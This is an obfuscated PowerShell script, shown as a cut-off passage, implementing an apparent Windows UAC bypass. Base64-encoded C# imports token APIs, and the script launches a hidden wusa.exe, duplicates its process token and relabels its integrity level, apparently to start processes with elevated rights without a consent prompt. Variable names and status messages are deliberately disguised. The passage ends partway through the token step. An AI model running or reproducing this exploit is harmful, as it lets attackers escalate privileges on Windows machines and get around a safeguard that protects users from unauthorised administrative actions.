function uacmagic {
	param(
		[Parameter(Mandatory = $True)]
		[String]$BinPath,
		[Parameter(Mandatory = $False)]
		[String]$Args,
		[Parameter(Mandatory = $False)]
		[int]$ProcPID
	)
	Add-Type -TypeDefinition $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgAJAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAAkAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoACQB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsADsADQAKAAkADQAKAAkAWwBTAHQAcgB1AGMAdABMAGEAeQBvAHUAdAAoAEwAYQB5AG8AdQB0AEsAaQBuAGQALgBTAGUAcQB1AGUAbgB0AGkAYQBsACkAXQANAAoACQBwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAAUABSAE8AQwBFAFMAUwBfAEkATgBGAE8AUgBNAEEAVABJAE8ATgANAAoACQB7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAUAByAG8AYwBlAHMAcwA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAVABoAHIAZQBhAGQAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBQAHIAbwBjAGUAcwBzAEkAZAA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAZAB3AFQAaAByAGUAYQBkAEkAZAA7AA0ACgAJAH0ADQAKAAkADQAKAAkAWwBTAHQAcgB1AGMAdABMAGEAeQBvAHUAdAAoAEwAYQB5AG8AdQB0AEsAaQBuAGQALgBTAGUAcQB1AGUAbgB0AGkAYQBsACkAXQANAAoACQBwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAAUwBFAEMAVQBSAEkAVABZAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwANAAoACQB7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABpAG4AdAAgAG4ATABlAG4AZwB0AGgAOwANAAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAHAAUwBlAGMAdQByAGkAdAB5AEQAZQBzAGMAcgBpAHAAdABvAHIAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAaQBuAHQAIABiAEkAbgBoAGUAcgBpAHQASABhAG4AZABsAGUAOwANAAoACQB9AA0ACgAJAA0ACgAJAFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0ADQAKAAkAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAFQATwBLAEUATgBfAE0AQQBOAEQAQQBUAE8AUgBZAF8ATABBAEIARQBMAA0ACgAJAHsADQAKAAkACQBwAHUAYgBsAGkAYwAgAFMASQBEAF8AQQBOAEQAXwBBAFQAVABSAEkAQgBVAFQARQBTACAATABhAGIAZQBsADsADQAKAAkAfQANAAoACQANAAoACQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAA0ACgAJAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABTAEkARABfAEEATgBEAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwANAAoACQB7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAFMAaQBkADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAFUASQBuAHQAMwAyACAAQQB0AHQAcgBpAGIAdQB0AGUAcwA7AA0ACgAJAH0ADQAKAAkADQAKAAkAWwBTAHQAcgB1AGMAdABMAGEAeQBvAHUAdAAoAEwAYQB5AG8AdQB0AEsAaQBuAGQALgBTAGUAcQB1AGUAbgB0AGkAYQBsACwAIABDAGgAYQByAFMAZQB0ACAAPQAgAEMAaABhAHIAUwBlAHQALgBVAG4AaQBjAG8AZABlACkAXQANAAoACQBwAHUAYgBsAGkAYwAgAHMAdAByAHUAYwB0ACAAUwBUAEEAUgBUAFUAUABJAE4ARgBPAA0ACgAJAHsADQAKAAkACQBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABjAGIAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAHAAUgBlAHMAZQByAHYAZQBkADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABwAEQAZQBzAGsAdABvAHAAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAHAAVABpAHQAbABlADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABkAHcAWAA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAZAB3AFkAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBYAFMAaQB6AGUAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBZAFMAaQB6AGUAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBYAEMAbwB1AG4AdABDAGgAYQByAHMAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBZAEMAbwB1AG4AdABDAGgAYQByAHMAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBGAGkAbABsAEEAdAB0AHIAaQBiAHUAdABlADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABkAHcARgBsAGEAZwBzADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAaABvAHIAdAAgAHcAUwBoAG8AdwBXAGkAbgBkAG8AdwA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABjAGIAUgBlAHMAZQByAHYAZQBkADIAOwANAAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAHAAUgBlAHMAZQByAHYAZQBkADIAOwANAAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABoAFMAdABkAEkAbgBwAHUAdAA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAUwB0AGQATwB1AHQAcAB1AHQAOwANAAoACQAJAHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABoAFMAdABkAEUAcgByAG8AcgA7AA0ACgAJAH0ADQAKAAkADQAKAAkAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAFMASQBEAF8ASQBEAEUATgBUAEkARgBJAEUAUgBfAEEAVQBUAEgATwBSAEkAVABZACAADQAKAAkAewANAAoACQBbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEIAeQBWAGEAbABBAHIAcgBhAHkALAAgAFMAaQB6AGUAQwBvAG4AcwB0AD0ANgApAF0ADQAKAAkAcAB1AGIAbABpAGMAIABiAHkAdABlAFsAXQAgAFYAYQBsAHUAZQA7AA0ACgAJAHAAdQBiAGwAaQBjACAAUwBJAEQAXwBJAEQARQBOAFQASQBGAEkARQBSAF8AQQBVAFQASABPAFIASQBUAFkAKABiAHkAdABlAFsAXQAgAHYAYQBsAHUAZQApAA0ACgAJAHsADQAKAAkACQBWAGEAbAB1AGUAIAA9ACAAdgBhAGwAdQBlADsADQAKAAkAfQANAAoACQB9AA0ACgAJAA0ACgAJAFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0ADQAKAAkAcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAFMASABFAEwATABFAFgARQBDAFUAVABFAEkATgBGAE8ADQAKAAkAewANAAoACQAJAHAAdQBiAGwAaQBjACAAaQBuAHQAIABjAGIAUwBpAHoAZQA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAZgBNAGEAcwBrADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAaAB3AG4AZAA7AA0ACgAJAAkAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAVABTAHQAcgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABwAFYAZQByAGIAOwANAAoACQAJAFsATQBhAHIAcwBoAGEAbABBAHMAKABVAG4AbQBhAG4AYQBnAGUAZABUAHkAcABlAC4ATABQAFQAUwB0AHIAKQBdAA0ACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGwAcABGAGkAbABlADsADQAKAAkACQBbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABUAFMAdAByACkAXQANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAHAAUABhAHIAYQBtAGUAdABlAHIAcwA7AA0ACgAJAAkAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAVABTAHQAcgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABwAEQAaQByAGUAYwB0AG8AcgB5ADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAGkAbgB0ACAAbgBTAGgAbwB3ADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAaABJAG4AcwB0AEEAcABwADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABwAEkARABMAGkAcwB0ADsADQAKAAkACQBbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABUAFMAdAByACkAXQANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAHAAQwBsAGEAcwBzADsADQAKAAkACQBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAaABrAGUAeQBDAGwAYQBzAHMAOwANAAoACQAJAHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGQAdwBIAG8AdABLAGUAeQA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgASQBjAG8AbgA7AA0ACgAJAAkAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGgAUAByAG8AYwBlAHMAcwA7AA0ACgAJAH0ADQAKAA0ACgAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABVAEEAQwBUAG8AawBlAG4ATQBhAGcAaQBjAA0ACgAJAHsADQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUALAAgAFMAZQB0AEwAYQBzAHQARQByAHIAbwByAD0AdAByAHUAZQApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwBXAGkAdABoAEwAbwBnAG8AbgBXACgADQAKAAkACQAJAFMAdAByAGkAbgBnACAAdQBzAGUAcgBOAGEAbQBlACwADQAKAAkACQAJAFMAdAByAGkAbgBnACAAZABvAG0AYQBpAG4ALAANAAoACQAJAAkAUwB0AHIAaQBuAGcAIABwAGEAcwBzAHcAbwByAGQALAANAAoACQAJAAkAaQBuAHQAIABsAG8AZwBvAG4ARgBsAGEAZwBzACwADQAKAAkACQAJAFMAdAByAGkAbgBnACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAE4AYQBtAGUALAANAAoACQAJAAkAUwB0AHIAaQBuAGcAIABjAG8AbQBtAGEAbgBkAEwAaQBuAGUALAANAAoACQAJAAkAaQBuAHQAIABjAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKAAkACQAJAGkAbgB0ACAAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACwADQAKAAkACQAJAFMAdAByAGkAbgBnACAAYwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAsAA0ACgAJAAkACQByAGUAZgAgACAAUwBUAEEAUgBUAFUAUABJAE4ARgBPACAAcwB0AGEAcgB0AHUAcABJAG4AZgBvACwADQAKAAkACQAJAG8AdQB0ACAAUABSAE8AQwBFAFMAUwBfAEkATgBGAE8AUgBNAEEAVABJAE8ATgAgAHAAcgBvAGMAZQBzAHMASQBuAGYAbwByAG0AYQB0AGkAbwBuACkAOwANAAoACQANAAoACQAJAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAIAA9ACAAQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdAA0ACgAJAAkAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlACgADQAKAAkACQAJAFMAdAByAGkAbgBnACAAbABwAEYAaQBsAGUATgBhAG0AZQAsAA0ACgAJAAkACQBVAEkAbgB0ADMAMgAgAGQAdwBEAGUAcwBpAHIAZQBkAEEAYwBjAGUAcwBzACwADQAKAAkACQAJAFUASQBuAHQAMwAyACAAZAB3AFMAaABhAHIAZQBNAG8AZABlACwADQAKAAkACQAJAEkAbgB0AFAAdAByACAAbABwAFMAZQBjAHUAcgBpAHQAeQBBAHQAdAByAGkAYgB1AHQAZQBzACwADQAKAAkACQAJAFUASQBuAHQAMwAyACAAZAB3AEMAcgBlAGEAdABpAG8AbgBEAGkAcwBwAG8AcwBpAHQAaQBvAG4ALAANAAoACQAJAAkAVQBJAG4AdAAzADIAIABkAHcARgBsAGEAZwBzAEEAbgBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAANAAoACQAJAAkASQBuAHQAUAB0AHIAIABoAFQAZQBtAHAAbABhAHQAZQBGAGkAbABlACkAOwANAAoADQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACgADQAKAAkACQAJAFUASQBuAHQAMwAyACAAcAByAG8AYwBlAHMAcwBBAGMAYwBlAHMAcwAsAA0ACgAJAAkACQBiAG8AbwBsACAAYgBJAG4AaABlAHIAaQB0AEgAYQBuAGQAbABlACwADQAKAAkACQAJAGkAbgB0ACAAcAByAG8AYwBlAHMAcwBJAGQAKQA7AA0ACgAJAA0ACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAoAA0ACgAJAAkACQBJAG4AdABQAHQAcgAgAFAAcgBvAGMAZQBzAHMASABhAG4AZABsAGUALAAgAA0ACgAJAAkACQBpAG4AdAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAANAAoACQAJAAkAcgBlAGYAIABJAG4AdABQAHQAcgAgAFQAbwBrAGUAbgBIAGEAbgBkAGwAZQApADsADQAKAAkADQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdAA0ACgAJAAkAcAB1AGIAbABpAGMAIABlAHgAdABlAHIAbgAgAHMAdABhAHQAaQBjACAAYgBvAG8AbAAgAEQAdQBwAGwAaQBjAGEAdABlAFQAbwBrAGUAbgBFAHgAKAANAAoACQAJAAkASQBuAHQAUAB0AHIAIABoAEUAeABpAHMAdABpAG4AZwBUAG8AawBlAG4ALAANAAoACQAJAAkAdQBpAG4AdAAgAGQAdwBEAGUAcwBpAHIAZQBkAEEAYwBjAGUAcwBzACwADQAKAAkACQAJAHIAZQBmACAAUwBFAEMAVQBSAEkAVABZAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwAgAGwAcABUAG8AawBlAG4AQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAJAAkACQBpAG4AdAAgAEkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsACwADQAKAAkACQAJAGkAbgB0ACAAVABvAGsAZQBuAFQAeQBwAGUALAANAAoACQAJAAkAcgBlAGYAIABJAG4AdABQAHQAcgAgAHAAaABOAGUAdwBUAG8AawBlAG4AKQA7AA0ACgAJAA0ACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQQBsAGwAbwBjAGEAdABlAEEAbgBkAEkAbgBpAHQAaQBhAGwAaQB6AGUAUwBpAGQAKAANAAoACQAJAAkAcgBlAGYAIABTAEkARABfAEkARABFAE4AVABJAEYASQBFAFIAXwBBAFUAVABIAE8AUgBJAFQAWQAgAHAASQBkAGUAbgB0AGkAZgBpAGUAcgBBAHUAdABoAG8AcgBpAHQAeQAsAA0ACgAJAAkACQBiAHkAdABlACAAbgBTAHUAYgBBAHUAdABoAG8AcgBpAHQAeQBDAG8AdQBuAHQALAAgAA0ACgAJAAkACQBpAG4AdAAgAGQAdwBTAHUAYgBBAHUAdABoAG8AcgBpAHQAeQAwACwAIABpAG4AdAAgAGQAdwBTAHUAYgBBAHUAdABoAG8AcgBpAHQAeQAxACwAIAANAAoACQAJAAkAaQBuAHQAIABkAHcAUwB1AGIAQQB1AHQAaABvAHIAaQB0AHkAMgAsACAAaQBuAHQAIABkAHcAUwB1AGIAQQB1AHQAaABvAHIAaQB0AHkAMwAsACAADQAKAAkACQAJAGkAbgB0ACAAZAB3AFMAdQBiAEEAdQB0AGgAbwByAGkAdAB5ADQALAAgAGkAbgB0ACAAZAB3AFMAdQBiAEEAdQB0AGgAbwByAGkAdAB5ADUALAAgAA0ACgAJAAkACQBpAG4AdAAgAGQAdwBTAHUAYgBBAHUAdABoAG8AcgBpAHQAeQA2ACwAIABpAG4AdAAgAGQAdwBTAHUAYgBBAHUAdABoAG8AcgBpAHQAeQA3ACwAIAANAAoACQAJAAkAcgBlAGYAIABJAG4AdABQAHQAcgAgAHAAUwBpAGQAKQA7AA0ACgAJAA0ACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABTAGUAdABJAG4AZgBvAHIAbQBhAHQAaQBvAG4AVABvAGsAZQBuACgADQAKAAkACQAJAEkAbgB0AFAAdAByACAAVABvAGsAZQBuAEgAYQBuAGQAbABlACwADQAKAAkACQAJAGkAbgB0ACAAVABvAGsAZQBuAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBDAGwAYQBzAHMALAANAAoACQAJAAkAcgBlAGYAIABUAE8ASwBFAE4AXwBNAEEATgBEAEEAVABPAFIAWQBfAEwAQQBCAEUATAAgAFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4ALAANAAoACQAJAAkAaQBuAHQAIABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuAEwAZQBuAGcAdABoACkAOwANAAoADQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEYAaQBsAHQAZQByAFQAbwBrAGUAbgAoAA0ACgAJAAkACQBJAG4AdABQAHQAcgAgAFQAbwBrAGUAbgBIAGEAbgBkAGwAZQAsAA0ACgAJAAkACQBVAEkAbgB0ADMAMgAgAEYAbABhAGcAcwAsAA0ACgAJAAkACQBJAG4AdABQAHQAcgAgAFMAaQBkAHMAVABvAEQAaQBzAGEAYgBsAGUALAANAAoACQAJAAkASQBuAHQAUAB0AHIAIABQAHIAaQB2AGkAbABlAGcAZQBzAFQAbwBEAGUAbABlAHQAZQAsAA0ACgAJAAkACQBJAG4AdABQAHQAcgAgAFIAZQBzAHQAcgBpAGMAdABlAGQAUwBpAGQAcwAsAA0ACgAJAAkACQByAGUAZgAgAEkAbgB0AFAAdAByACAAaABUAG8AawBlAG4AKQA7AA0ACgAJAA0ACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAYQBkAHYAYQBwAGkAMwAyAC4AZABsAGwAIgApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAASQBtAHAAZQByAHMAbwBuAGEAdABlAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByACgADQAKAAkACQAJAEkAbgB0AFAAdAByACAAaABUAG8AawBlAG4AKQA7AA0ACgAJAA0ACgAJAAkAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoACQAJAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABUAGUAcgBtAGkAbgBhAHQAZQBQAHIAbwBjAGUAcwBzACgADQAKAAkACQAJAEkAbgB0AFAAdAByACAAaABQAHIAbwBjAGUAcwBzACwADQAKAAkACQAJAHUAaQBuAHQAIAB1AEUAeABpAHQAQwBvAGQAZQApADsADQAKAAkADQAKAAkACQBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBzAGgAZQBsAGwAMwAyAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAAkACQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUARQB4ACgADQAKAAkACQAJAHIAZQBmACAAUwBIAEUATABMAEUAWABFAEMAVQBUAEUASQBOAEYATwAgAGwAcABFAHgAZQBjAEkAbgBmAG8AKQA7AA0ACgAJAAkAfQA=')))
	${_/===\/=\/\_/\/==} = ni -Path C:\Windows\System32\test.txt -Type file -ErrorAction SilentlyContinue
	if (!${_/===\/=\/\_/\/==}) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbACoAXQAgAFMAZQBzAHMAaQBvAG4AIABpAHMAIABuAG8AdAAgAGUAbABlAHYAYQB0AGUAZAA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgBbACEAXQAgAFMAZQBzAHMAaQBvAG4AIABpAHMAIABlAGwAZQB2AGEAdABlAGQAIQAKAA==')))
		del C:\Windows\System32\test.txt
		Break
	}
	if ($ProcPID){
		${_/\/\__/=\/=\/\/\} = ps -Id $ProcPID -ErrorAction SilentlyContinue
		if (!${_/\/\__/=\/=\/\/\}) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABJAG4AdgBhAGwAaQBkACAAcAByAG8AYwBlAHMAcwAgAHMAcABlAGMAaQBmAGkAZQBkACEACgA=')))
			Break
		}
		${_/==\/\/\___/==\/} = [UACTokenMagic]::OpenProcess(0x00001000,$false,$ProcPID)
		if (${_/==\/\/\___/==\/} -ne 0) {
			echo "[*] Successfully acquired $((ps -Id $ProcPID).Name) handle"
		} else {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGcAZQB0ACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgAhAAoA')))
			Break
		}
	} else {
		${__/\/===\_/\/\/\/} = New-Object SHELLEXECUTEINFO
		${__/\/===\_/\/\/\/}.cbSize = [System.Runtime.InteropServices.Marshal]::SizeOf(${__/\/===\_/\/\/\/})
		${__/\/===\_/\/\/\/}.fMask = 0x40 
		${__/\/===\_/\/\/\/}.lpFile = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB1AHMAYQAuAGUAeABlAA==')))
		${__/\/===\_/\/\/\/}.nShow = 0x0 
		if ([UACTokenMagic]::ShellExecuteEx([ref]${__/\/===\_/\/\/\/})) {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABXAFUAUwBBACAAcAByAG8AYwBlAHMAcwAgAGMAcgBlAGEAdABlAGQA')))
			${_/==\/\/\___/==\/} = ${__/\/===\_/\/\/\/}.hProcess
		} else {
			echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGMAcgBlAGEAdABlACAAVwBVAFMAQQAgAHAAcgBvAGMAZQBzAHMAIQAKAA==')))
			Break
		}
	}
	${/=\/=\/\/==\_/==\} = [IntPtr]::Zero
	if ([UACTokenMagic]::OpenProcessToken(${_/==\/\/\___/==\/},0x02000000,[ref]${/=\/=\/\/==\_/==\})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABPAHAAZQBuAGUAZAAgAHAAcgBvAGMAZQBzAHMAIAB0AG8AawBlAG4A')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAG8AcABlAG4AIABwAHIAbwBjAGUAcwBzACAAdABvAGsAZQBuACEACgA=')))
		Break
	}
	${____/===\/=\___/=} = [IntPtr]::Zero
	${___/======\/=====} = New-Object SECURITY_ATTRIBUTES
	if ([UACTokenMagic]::DuplicateTokenEx(${/=\/=\/\/==\_/==\},0xf01ff,[ref]${___/======\/=====},2,1,[ref]${____/===\/=\___/=})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABEAHUAcABsAGkAYwBhAHQAZQBkACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGQAdQBwAGwAaQBjAGEAdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgAhAAoA')))
		Break
	}
	${/=====\___/\/===\} = New-Object SID_IDENTIFIER_AUTHORITY
	${/=====\___/\/===\}.Value = [Byte[]](0x0,0x0,0x0,0x0,0x0,0x10)
	${__/\________/\/\/} = [IntPtr]::Zero
	if ([UACTokenMagic]::AllocateAndInitializeSid([ref]${/=====\___/\/===\},1,0x2000,0,0,0,0,0,0,0,[ref]${__/\________/\/\/})) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABJAG4AaQB0AGkAYQBsAGkAegBlAGQAIABNAGUAZABJAEwAIABTAEkARAA=')))
	} else {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAhAF0AIABGAGEAaQBsAGUAZAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAIABTAEkARAAhAAoA')))
		Break
	}
	${___/=\__/\___/\__} = New-Object SID_AND_ATTRIBUTES
	${___/=\__/\___/\__}.Sid = ${__/\________/\/\/}
	${___/=\__/\___/\__}.Attributes = 0x20 
	${___/\/=\_/=======} = New-Object TOKEN_MANDATORY_LABEL
	${___/\/=\_/=======}.Label = ${___/=\__/\___/\__}
	${_____/=\/=\/\/===} = [System.Runtime.InteropServices.Marshal]::SizeOf(${___/\/=\_/=======})
	if([UACTokenMagic]::NtSetInformationToken(${____/===\/=\___/=},25,[ref]${___/\/=\_/=======},$(${_____/=\/=\/\/===})) -eq 0) {
		echo $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwAqAF0AIABMAG8AdwBlAHIAZQBkACAAdABvAGsAZQBuACAAbQBhAG4AZABhAHQAbwByAHkAIABJAEwA')))
	} else {
